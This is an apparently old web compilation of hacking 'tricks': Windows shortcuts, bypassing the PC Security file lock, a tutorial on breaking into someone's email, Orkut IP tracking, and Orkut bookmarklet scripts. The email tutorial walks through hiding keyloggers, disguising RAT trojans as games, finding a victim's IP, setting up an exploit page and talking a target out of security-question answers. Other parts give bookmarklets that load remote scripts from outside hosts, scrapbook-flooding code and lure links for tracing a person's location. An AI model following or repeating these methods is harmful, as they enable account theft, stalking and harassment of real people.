Windows Logo + V: Starts Clipboard
Windows Logo + K: Opens Keyboard Properties dialog box
Windows Logo + I: Opens Mouse Properties dialog box
Windows Logo + A: Starts Accessibility Options (if installed)
Windows Logo + SPACEBAR: Displays the list of Microsoft IntelliType shortcut keys
Windows Logo + S: Toggles CAPS LOCK on and off


Dialog Box Keyboard Commands:

TAB: Move to the next control in the dialog box
SHIFT + TAB: Move to the previous control in the dialog box
SPACEBAR: If the current control is a button, this clicks the button. If the current control is a check box, this toggles the check box. If the current control is an option, this selects the option.
ENTER: Equivalent to clicking the selected button (the button with the outline)
ESC: Equivalent to clicking the Cancel button
ALT + underlined letter in dialog box item: Move to the corresponding item

Breaking PC security..

Simple Guide 4 opening files locked by PC Security

Pc security.. one of the most comfortable software to keep ur data protected.. even i use it.. but.. check is out..


First of all the bloody disclaimer

1. Information here is only 4 educational purpose nd u shall be responsible 4 all the damage if any or legal shit that u may Find yourself in ;while using the info here( like an asshole)
2. u understand that u r using the info here 4 yourself only nd not 4 harming anyone in anyway or invading privacy of others. It is also acknowledge that u will not using information here to do anything illegal 4 I shall not be held responsible 4 anything.

What is PC Security?
It is a very good software 4 password protecting ur files , folders , drives ,programs nd 4 that matter the whole computer by www.tropsoft.com.

What can this guide do 4 me ?
Not much but it can help u to open a file protected by PC Security ver.5.1 under
Certain conditions.

What do u mean by "under certain condition" ?
Well u can access file protected by PC Security v5.1 only when the locked file is kept in a folder which is not protected that it is u can see the file kept in a folder nd when u click the file(protected file) it gives u strange messages like " access denied "or the "file is used by another program "which tells u that the file is protected .

How can I unlock files protected by PC Security nd what all do I need 4 it ?
Well all u need is a program called MAGIC FOLDERS nd a cup of coffee to drink while u play. I have used version 1.31You can get MAGIC FOLDERS here www.pc-magic.com
Now find the file that u want to unlock nd see in which folder it is kept nd now



Open magic folders (make sure that u install magic folder before doing all this nd make sure that u don't use the feature called encrypted magic folder which comes with it ;usually it does'nt automatically encrypt the folders but make sure that it does
Not do it automatically (I hope it would 'nt do it automatically as it does'nt do with mine) If you're using a non-english version of Win95/98 u may need the english version of the VB5 runtime files. u can get them at:

http://pc-magic.com/dl.htm if cannot install the magic folder on ur PC u need to download some dll files from above mentioned site.

Now that u have installed magic folder open it nd hide (make that folder invisible )the folder in which locked file is kept nd close the program nd shut down ur computer now when u will reboot then again open the magic folders now u should make the folder that u have just made invisible visible ie. Folder that u have made invisble before rebooting the system now make it visible again nd now open the folder nd click on the file Congrats fh !! the file is opened nd now u have full access to the file.

Hacking E-Mail..Account

I do not endorse Hacking !
This is meant for educational purpose only !
I want u to know how others can try break into your Personal life !
Beware !!

This is a Genuine Article.
Will try to add in as much as possible
keep posting !
comment on this article !

Introduction


I have written this tutorial to address a question that is all too commonly asked in any channel/chat room with "hack" in the title (asked in frequency to the point of harrassment really). So since this is a question that so many people ask, then I believe that there should at least be an answer available (regardless of the morality or "lameness" of such a question). So you as the reader are most likely reading this because you want to break into somebody's email account.


Well, you must understand that there is no 1-2-3 process to anything. I will give you options to consider when persuing such a task, but it will ultimately be up to you to do this. This is what you want to do, and no matter what sort of offers you throw up at anybody, nobody is going to do this for you. There is no program that is going to do all this for you. Also don't forget that nobody is going to hold your hand and lead you through this. I'm offering you as the reader suggestions for ways you can address this task, and that is about all the help you are going to get from anybody. So now that I've made all that clear, let's begin...

Things You Should Know


As I mentioned in the previous section, there is no program that will do all this for you. Almost all the crackers you see out there will not work, because services like Hotmail, Yahoo!, etc. have it set so that it will lock you from that account after a certain number of login attempts. There are some rare exceptions, like some crackers for Yahoo! that are made for cracking "illegal" accounts, but the thing you must understand about those types of crackers is that they are built to crack SPECIFICALLY "illegal" names. They can not be used to target a specific account on Yahoo!, so don't try to use them for this purpose. Another thing you must know if you ask this question in any "hacker" chat room/channel (which I highly discourage), or if you read something on this topic, and you hear that you have to email some address and in any way have to give up your password in the process, do NOT believe this. This is a con used to trick gullible people into handing over their passwords. So don't fall for this. Well that concludes this section, now lets get to what you want to know.

If You Have Physical Access


I will start off with options you have if you have physical access to the computer of the user that you are targeting, because it is a lot easier if you do. One option you have, that you will hear a lot if you ask this question, and anybody bothers to answer is to use a keylogger. A keylogger is an excellent option, and probably the easiest. There are a lot of keyloggers out there, ranging from hardware key loggers, to software keyloggers. For this task, you won't need to buy a hardware key loggers, since the only advantage to a hardware one is that you can grab passwords that are given to access a certain local user on the operating system used. There are a lot of software keyloggers out there, and you can feel free to check out www.google.com to look at your options. I will go ahead and toss a couple of keyloggers out to try for those of you who seem allergic to search engines.


One option you have that is good for a free keylogger is Perfect Keylogger (which you can find at www.blazingtools.com/bpk.html). It works just fine, and has some nice options to keep it hidden from your average end user (computer user).


Another option you have, which is probably the best one you can get is Ghost Keylogger. It has a lot of options that will allow you to get the results of this program remotely (it will email you the results). However, this is not a free keylogger, so if you are wanting to get a copy you can look on the file sharing networks for a copy of the program, and the serial number for it (look on www.zeropaid.com for different file sharing clients you can try).


Once you have whatever keylogger you are going to use downloaded, just install it onto the computer you are wanting to monitor, and wait till next time they login to their email account. You will then have the password for the account. Another option you have if they use Outlook to access their email account, is to copy the *.dbx files for their Outlook account onto a floppy, and extract the emails at home (the dbx file stores the files stored in each Outlook folder on a given account, meaning the received and sent emails). When you are on the computer of the user you are targeting, look in

C:\Windows\ApplicationData\Identities\{ACblahblahblah}\Microsoft\ OutlookExpress\ and copy all the .dbx files onto a floppy. Then when you take the .dbx files back to your house, use DBXtract to extract the messages from these files. Check out the link below to download this program....

www.download-freeware-shareware.com/Freeware-Internet.php?Type=4171



Another option you have if you have physical access is to execute a RAT (Remote Administration Tool, you may know these programs as trojans) server on the computer. Of course, you do not have to have physical access to go this route, but it helps. What you must understand is that these tools are known threats, and the popular ones are quickly detected by antivirus software, and thusly taken care of. Even ISPs block incoming/outgoing traffic from the most popular ports used by these programs.



One newcomer in the RAT market that you should know about is Project Leviathan. This program uses already existing services to host it's service, instead of opening up an entirely new port. This allows it to hide itself from any port detection tool/software firewall that may be in place. This of course will not guarantee that it's server program will not be detected by any antivirus software used (actually, if the user has kept up with his/her signature tables, then it WILL be detected), but it will give you more of a chance of holding access. Search the engines to download Project Leviathan...




Once you have downloaded this tool, follow the instructions listed to install and use this program. However, since this RAT is a command line tool, you will still need another program set up on the user's computer in order to catch the desired password. For this, you can use Password Logger.. Google it




Once you have this downloaded, set it up on the targeted computer. The program will remain hidden, while logging any types of passwords into a .lst file in the same directory that you executed it on. Therefore, you can access this *.lst file through Project Leviathan remotely in order to retrieve the user's email password remotely. Well that pretty much concludes it for this section. At this very moment I can practically hear a lot of you thinking to yourselves "But, but I don't HAVE physical access!". No reason to worry, that's what the next section is for...


If You Don't Have Physical Access



Well of course most of you out there will say that you don't have physical access to your target's computer. That's fine, there still are ways you can gain access into the desired email account without having to have any sort of physical access. For this we are going to go back onto the RAT topic, to explain methods that can be used to fool the user into running the server portion of the RAT (again, a RAT is a trojan) of your choice. Well first we will discuss the basic "send file" technique. This is simply convincing the user of the account you want to access to execute the server portion of your RAT.


To make this convincing, what you will want to do is bind the server.exe to another *.exe file in order to not raise any doubt when the program appears to do nothing when it is executed. For this you can use the tool like any exe file to bind it into another program (make it something like a small game)...



On a side note, make sure the RAT of your choice is a good choice. The program mentioned in the previous section would not be good in this case, since you do need physical access in order to set it up. You will have to find the program of your choice yourself (meaning please don't ask around for any, people consider that annoying behavior).


If you don't like any of those, I'm afraid you are going to have to go to www.google.com, and look for some yourself. Search for something like "optix pro download", or any specific trojan. If you look long enough, among all the virus notification/help pages, you should come across a site with a list of RATs for you to use (you are going to eventually have to learn how to navigate a search engine, you can't depend on handouts forever). Now back to the topic at hand, you will want to send this file to the specified user through an instant messaging service.


The reason why is that you need the ip address of the user in order to connect with the newly established server. Yahoo! Messenger, AOL Instant Messenger, it really doesn't matter. What you will do is send the file to the user. Now while this transfer is going on you will go to Start, then Run, type in "command", and press Enter. Once the msdos prompt is open, type in "netstat -n", and again, press enter. You will see a list of ip addresses from left to right. The address you will be looking for will be on the right, and the port it's established on will depend on the instant messaging service you are using. With MSN Messenger it will be remote port 6891, with AOL Instant Messenger it will be remote port 2153, with ICQ it will be remote port 1102, 2431, 2439, 2440, or 2476, and with Yahoo! Messenger it will be remote port 1614.


So once you spot the established connection with the file transfer remote port, then you will take note of the ip address associated with that port. So once the transfer is complete, and the user has executed the server portion of the RAT, then you can use the client portion to sniff out his/her password the next time he/she logs on to his/her account.


Don't think you can get him/her to accept a file from you? Can you at least get him/her to access a certain web page? Then maybe this next technique is something you should look into.


Currently Internet Explorer is quite vulnerable to an exploit that allows you to drop and execute .exe files via malicious scripting within an html document. For this what you will want to do is set up a web page, make sure to actually put something within this page so that the visitor doesn't get too entirely suspicious, and then imbed the below script into your web page so that the server portion of the RAT of your choice is dropped and executed onto the victim's computer...




While you are at it, you will also want to set up an ip logger on the web page so that you can grab the ip address of the user so that you can connect to the newly established server. Here is the source for a php ip logger you can use on your page...


http://www.planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=539&lngWId=8


Just insert this source into your page along with the exedrop script, and you are set. Just convince the user to go to this page, and wait till the next time they type in their email password. However, what do you do if you can not contact this user in any way to do any of the above tricks. Well, then you definately have your work cut out for you. It doesn't make the task impossible, but it makes it pretty damn close to it. For this we will want to try info cracking. Info cracking is the process of trying to gather enough information on the user to go through the "Forgot my Password" page, to gain access into the email account.

If you happen to know the user personally, then it helps out a lot. You would then be able to get through the birthday/ zipcode questions with ease, and with a little mental backtracking, or social engineering (talking) out the information from the user be able to get past the secret question. However, what do you do if you do not have this luxury? Well in this case you will have to do a little detective work to fish out the information you need.

First off, if a profile is available for the user, look at the profile to see if you can get any information from the profile. Many times users will put information into their profile, that may help you with cracking the account through the "Forgot my Password" page (where they live, their age, their birthday if you are lucky). If no information is provided then what you will want to do is get on an account that the user does not know about, and try to strike conversation with the user. Just talk to him/her for a little while, and inconspicuously get this information out of the user (inconspicuously as in don't act like you are trying to put together a census, just make casual talk with the user and every once in a while ask questions like "When is your birthday?" and "Where do you live?", and then respond with simple, casual answers).


Once you have enough information to get past the first page, fill those parts out, and go to the next page to find out what the secret question is. Once you have the secret question, you will want to keep making casual conversation with the user and SLOWLY build up to asking a question that would help you answer the secret question. Don't try to get all the information you need in one night or you will look suspicious. Patience is a virtue when info cracking. Just slowly build up to this question. For example, if the secret question is something like "What is my dog's name?", then you would keep talking with the user, and eventually ask him/her "So how many dogs do you have? ...Oh, that's nice. What are their names?". The user will most likely not even remember anything about his/her secret question, so will most likely not find such a question suspicious at all (as long as you keep it inconspicuous). So there you go, with a few choice words and a little given time, you have just gotten the user to tell you everything you need to know to break into his/her email account. The problem with this method is that once you go through the "Forgot my Password" page, the password will be changed, and the new password will be given to you. This will of course deny the original user access to his/her own account. But the point of this task is to get YOU access, so it really shouldn't matter. Anyways, that concludes it for this tutorial. Good luck...

HOW TO FIND IP ADDRESS AND LOCATION OF AN ORKUT PROFILE USER

First Step, Create a Blog.

I would use blogger in this example, but you may use any blog which allows embedding HTML and JavaScript Codes. Don't use a popular blog which gets many hits because it would be hard to track the user of the Orkut Profile


Create a StatCounter Account and "Add new Project". Setup is very simple you just need your blog address and access rights.


Install the StatCounter code in your blog, you have two methods one is in the StatCounter Website and other is manually embedding the code. For both you have to click Install Code after you have successfully added the project.

Your Code would look something like this.


Code corrupted. Insert fresh copy.

You have to install that in your blog as in the illustration below.


Now the final step. You just have to compose a convincing enough message for your target to click on (Not very hard eh!). It can be through Scrap or Community whatever way you can get through. If you cannot contact or get the person to click on the link then this method would not work.


Once he/she click it, a detailed record would come up in the StatCounter Website.



If the target has been harassing you or doing something illegal, you may contact the police and get more details from the ISP. Now you all know it! :)




fJavaScripts-Collection of Orkut Scripts

Unlock Album:

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://www.orkutking.com/scripts/album.js';void(0)

Increase Fans:

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://www.orkutking.com/scripts/fans.js';void(0)

UNLOCK SCRAPBOOK:

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://www.orkutking.com/scripts/scrapbook.js';void(0)

GIFT FROM FRIEND:

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://www.orkutking.com/scripts/gift.js';void(0)
YOU can find ORKUT MEMBERS EASILY USING "GID" number.
follow the steps:
go to
http://www.orkut.com/Compose.aspx
in source u can find this

(option value="69837208")rockers(/option)
its nothing but
(option value="[GID]")[USER NAME](/option)

ANOTHER WAY IS
http://img4.orkut.com/images/medium/1182792200/[GID].jpg
JUST TYPE THE GID NUMBER IN THE ABOVE URL AND PASTE IT IN ADDRESS BAR,TO FIND THE PHOTO OF TAT PERSON.

TO SORT OUT GIRLS OR BOYS FROM OUR FRIENDS LIST JUST TYPE THE URL IN YOUR ADDRESS BAR AND PRESS ENTER:
http://www.orkut.com/FriendsList.aspx?uid=16339350426213208441&q=female

YOU NEED TO CHANGE THE UID NUMBER HERE.PUT YOUR UID NUMBER and TYPE MALE OR FEMALE IN THE LAST(its ur wish).(TO get the uid number, go to your profile and you ll see the uid number in the address bar..)

accept / reject all testimonials

script to accept all testimonials
javascript:i=1;setInterval('_submitForm(document.forms[ i ],"handleTestimonial");i=i+2',800);void(0)

script to reject all testimonials
javascript:i=2;setInterval('_submitForm(document.forms[ i ],"handleTestimonial");i=i+2',800);void(0)

PROFILE BLINKER:
JUST PASTE THIS SCRIPT IN ANY PROFILE TO MAKE IT BLINK.
javascript: cor = "red"; var timer_1; function Trickworld () {(cor == "yellow") ? cor = "red": cor = "yellow"; document.links[10].parentNode.parentNode.style.backgroundColor = cor; timer_1 = setTimeout('Trickworld ()',100)}; Trickworld ()

SCRAP ALL:
javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://userscripts.org/scripts/source/10416.user.js';void(0)
run in home page of orkut
works in IE,mozilla,opera everythin..
but yea if u have more than 250 frens then u get banned for 2 hours


Flooding Scrapbook
Steps to flood others scrapbook:
==> Go to the profile of your friend.
==> Copy Paste this in your address bar
javascript:var i=1;function sansor(){i=i+1;document.forms
[0].elements[2].value= “I have flooded our SCRAPBOOK by this number
of times”+”[green]”+i+”[/green]”;
document.getElementsByTagName(’input’).item(3).click();};
void(setInterval(sansor,500));

New Script
javascript:i=9874654;sar=’Flooding by Sanjay Kumar \n Orkut New Flooding Script Available on sansor.wordpress.com\n [silver]’; a=document.forms[0];a.action+=’&Action.submit=’; setInterval(”i++; a.scrapText.value=sar+i; a.submit()”,500);void(0)

==>Press Enter
Steps to flood your own scrapbook:
==>Open your own scrapboook
==> Copy paste this code
javascript:var i=” “;function sansor(){i=i+” “;
document.forms[0].elements[2].value=” “+i;
document.getElementsByTagName(’input’).item(3).click();};void
(setInterval(sansor,500));

==> Other technique: If you have enough time.. just write any message
and keep clicking the submit button.
ORKUT DOESNT THROW ANY ERROR FOR THE SAME MESSAGE BY THE OWNER.

Increasing Number of fans Increasing your fan list:
==> Add yourself in any fraud account you have.
==> Log into the fraud account.
==> Go to http://www.orkut.com/Friends.aspx
==> Put cursor on the “fan” icon. You will see at the status bar of your
browser (at the bottom of your browser) something like
” FRUS0016756489/US209709881 “. Write down that thing in a copy.
==> Now write this code in the addressbar
:javascript:i=0;for(i=0;i<=100;i++){sendRequest (”/SetKarma.aspx?cat=”+0+”& val=”+”3″+”&gid=”+”FRUS0009505081/US0014188150″);};void(0);==> Change “FRUS0009505081/US0014188150″ with the one you have
written in the copy.
==> Press Enter.
Testimonial Flodding ==> Open the testimonial writting page of your any friend.
==> Paste this in the address bar:
javascript:function sansor(){document.getElementsByTagName
(’input’).item(2).click();};void(setInterval(sansor,404));
Animated Orkut Windows ==>
Just copy paste in your browser and see what happens:
javascript:R=-1;DI=document.links;DIL=DI.length;function A(a,b,c)
{return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;DIS.position=’absolute’;
DIS.left=A(5,100,500);DIS.top=A(5.6,60,150)}setInterval
(’R++;B(R%DIL)’,15);void(0)

Invisible Name /Post == >
Press ALT +0173 [ from the side keyboard]It may not work inlaptops as side keyboards are not
available there.
Reverse the Post
i mean you dont need to type backword.. just use this keyword..
“& # 8 2 3 8″ with no spaces and blanks in between.

Bigger Display pic
javascript:i=128;void(setInterval(”i++;document.images[2].width=i”,0))

Color Change Code
javascript: i=0; c=[”green”,”blue”,”yellow”]; a=document.links;setInterval(’i++;a[i % document.links.length].style.color=c[i % c.length]’,10);void(0)

See All Album pic in original size
javascript:d=document.body.innerHTML; m=d.match(/http:..images3.orkut.com.images.milieu.{1,99}jpg/gi); for(z=0;z”)};void(0)

profiles of ppl who appear on orkut login page:

hi guys! here r the profiles of those ppl who appear on the orkut login page
http://www.orkut.com/Profile.aspx?uid=2272862923271189317
http://www.orkut.com/Profile.aspx?uid=10718026254166087282
http://www.orkut.com/Profile.aspx?uid=9399582026951088631
http://www.orkut.com/Profile.aspx?uid=15804644950037168350
http://www.orkut.com/Profile.aspx?uid=14020714422706042432
http://www.orkut.com/Profile.aspx?uid=13681263137832132423
http://www.orkut.com/Profile.aspx?uid=1050654464471387863


Orkut staff members
http://www.orkut.com/Profile.aspx?uid=3504732672376623859
http://www.orkut.com/Profile.aspx?uid=9311858411588551592
http://www.orkut.com/Profile.aspx?uid=14278765755902856939
http://www.orkut.com/Profile.aspx?uid=1405190888294923508
http://www.orkut.com/Profile.aspx?uid=7743577435527036354
http://www.orkut.com/Profile.aspx?uid=6318898048845095510
http://www.orkut.com/Profile.aspx?uid=11360413853134286246

If Orkut Blocked..Surf Anonymously using JAP!!
No problem if orkut/youtube etc is blocked in your office or college or school....
and you are fed up of using proxy websites and there low urfing speeds.And what
worse if these
proxy websites are also blocked.....phew!!!! But no problems.....Download JAP and
easily surf any blocked website with anonymity
Step 1: Download JAP
Step 2: Execute Setup file [may take few minutes depending uponinternet speed]
Step 3: Change you Explorer LAN connection settings Change the default gateway IP to 127.0.0.1 and port 4001.
Thats it you have gained independence to free to surf any website.... courtsey


Login orkut with single click:
By this method you can login to your account with a single click!
Only do this if you are the only user of the windows account you are entering this
because you save your orkut password in it!
Copy this script to notepad and replace
= > username with your username
= > password with your password
https://www.google.com/accounts/ServiceLoginBoxAuth?continue=http%3A%2F%2Fwww.orkut.com%2FyellowirLogin.aspx%3
Fmsg%3D0%26page%3D%252FHome.aspx%253Fxid%253D15447157386856769607
&followup=http%3A%2F%2Fwww.orkut.com%2FGLogin.aspx&service=orkut&nui=
2&skipvpage=true&skipll=true&hl=en-US&GA3T=zECWUupyr5Q&Email=username&Passwd=password&null=Sign+in

For Microsoft Internet Explorer
1. Open IE web browser
2. Click on Favorites (icon with the refresh button)
3. Select Add
4. Enter these values:- - - > Name = Orkut
5. Click OK (it will appear in the list) 6. Right click orkut and select properties
7. Enter these values:- - - > URL = the script you copied
8. Click Apply and OK
9. Now when ever you have to login, just select orkut from favorites, and
your homepage is 1 click away!

For Firefox
1. Open Firefox web browser
2. Click on Bookmarks
3. Select Organize Bookmarks
4. Select New Bookmark
5. Enter these values:- - -> Name = Orkut- - -> Location = the script you
copied- - - > Keyword = orkut
6. Click OK
7. Now when ever you have to login, just select orkut from bookmarks,
and your homepage is 1 click away!

For Opera
1. Open opera web browser
2. Click on bookmarks
3. Select Manage Bookmarks
4. On left side, Click Add
5. Enter these values:- - -> Name = Orkut- - -> Address = the script
you copied- - -> Nick name = Orkut
6. Click OK
7. Now when ever you have to login, just select orkut from bookmarks,
and your homepage is 1 click away!

Multiple Logins of Gmail and Orkut through firefox
Just follow the following steps and you will be able to login in gmail and
orkut with multiple accounts. Through this you will be able to make
profiles in your firefox.
Step 1:Open system properties(by right clicking my computer), choose
tab advanced, click to environment variables button. in system variables
section, click new.
type this information to each textbox.
Step 2:variable name: moz_no_remote (should be all small letter).
variable value: 1
Step 3:open firefox icon's properties(from desktop and quick launch).
add extension -p to command line(like "c:\program files\mozilla firefox
\firefox.exe" -p). press ok.
When you will open firefox it will prompt for profile selection create a
profile,open firefox login to orkut open once more use another profile login.

Multiple Login in Yahoo messenger!
Go to Start ==> Run ==>> Type regedit,hit enter
Go to HKEY_CURRENT_USER -> Software -> Yahoo -> pager -> Test
On the right pane ==>> right-click and choose new Dword value .
Rename it as Plural.
Double click and assign a decimal value of 1.
Now close registry and restart yahoo messenger.
For signing in with new id open another messenger .

Scrapbook refresher
This Scrapbook Auto Refresher trick refreshes your scrapbook for every few seconds
The default timer is set as 30 seconds.
If you want to change the default timer, follow the steps below.
1) Copy the code below in Notepad
2) Select 'save as'.
3) Save it as scrapbookrefresher.html
4) The code gets saved in ur default browser application, now view source.
5) Observe the 6th line ( )
6) Change the number "30" in the above line to the number of seconds you want.
7) Save the file by selecting File -> Save.
8) Close the notepad.
9) Double click (Opens in your Internet browser) on the scrapbookautorefresher.html file
to refresh your scrapbook for every few seconds.


Make mozilla run 10 times faster
1. Type "about:config" into the address bar and hit enter. Scroll dow
n and look for the following entries:
2. Alter the entries as follows:
Set "network.http.pipelining" to "true"
Set "network.http.proxy.pipelining" to "true"
set "network.http.pipelining.maxrequests" to some number like 30.
This means it will make 30 requests at once.
3. Lastly right-click anywhere and select New-> Integer.
Name it "nglayout.initialpaint.delay" and set its value to "0".
This value is the amount of time the browser waits before
it acts on information it recieves.
NOTE:this trick only works for broadband users not for dialup


Writing text in reverse order
Type the text in the scrapbook or any text box.
Type & # 8 2 3 8 without spaces before the message in the text box.
Example: "‮ This is message reverted."
Press SUBMIT.
The above message appears as >

Orkut Magic Tricks

Simply copy and paste the links.

Worst Profile On Orkut

http://www.netdisaster.com/go.php?mode=tomato&url=http://www.orkut.com



Best Profile

http://www.orkut.com/Profile.aspx???2pid=0031517960896443124

Best Album

http://www.orkut.com/AlbumView.aspx?2uid=003492118394569816

Best Scrapbook

http://www.orkut.com/Scrapbook.aspx?2uid=0068492192600342

View Friends Scrap more Than the Limit

Step1: Open Friends scrapbook

Step2: Look in your address bar (i.e the place where u type www.mastitrain.com). You will see this address written
http://www.orkut.com/Scrapbook.aspx?uid=12345678987654321

Step3: Add this code"&na=&nst=&nid=&pageSize=30" at the end of the address. It will look like this
http://www.orkut.com/Scrapbook.aspx?uid=12345678987654321&na=&nst=&nid=&pageSize=30

30 over specifies that you can view 30 scraps of the scrapbook you are looking into.
If u like our work Do Refer Your Friends so that we can continue


Send anonymous scrap

For sending a anonymous scrap, follow the steps:
Create a fake account.
Write the scraps to the person you want.
Delete the account.
Your scraps from the deleted account becomes anonymous.


Who Has Added U in There Crush List

To know who has added U in there Crush List, Follow the steps:

1) Add your friends in your crush list.

2) A message will arrive you from orkut in any of those have added you in their lists within five minutes.

3) After the use remove friends from crush list, so that if they try, they don't catch you.


Scrap Without name

For sending scraps without name follow the steps:

1) Open edit profile

2) Delete First and Second Name

3) Then on the first name text box type ALT + 0173 (i.e. Type 0173 while pressing the ALT key of your keyboard.)

4) Do the same in the Second Name Box.

5) Click Update.

Now you are done you can send scraps without your name



Send Invisible Scrap
So, Friend's welcome to the very first orkut trick.

Step1: Open scrapbook

Step2: Write [i] and submit it, an invisible scrap will b send

Note: Don't Write Anything Else [i]
You can try these various combinations also if u want to send a big no of invisible scraps, as after your few submissions it will start displaying the message "message sent too recently". So try these combinations out:
[u]
[b]
[i][u]
[i][b]
[u][i]
[u][b]
[u][i][b]
[i][u][b]
[i][u][b][i]
.
.
.
And just keep on increasing it will continue no limits...
One more method
Enter ் no space b/w the symbol and number, blank scrap will be send.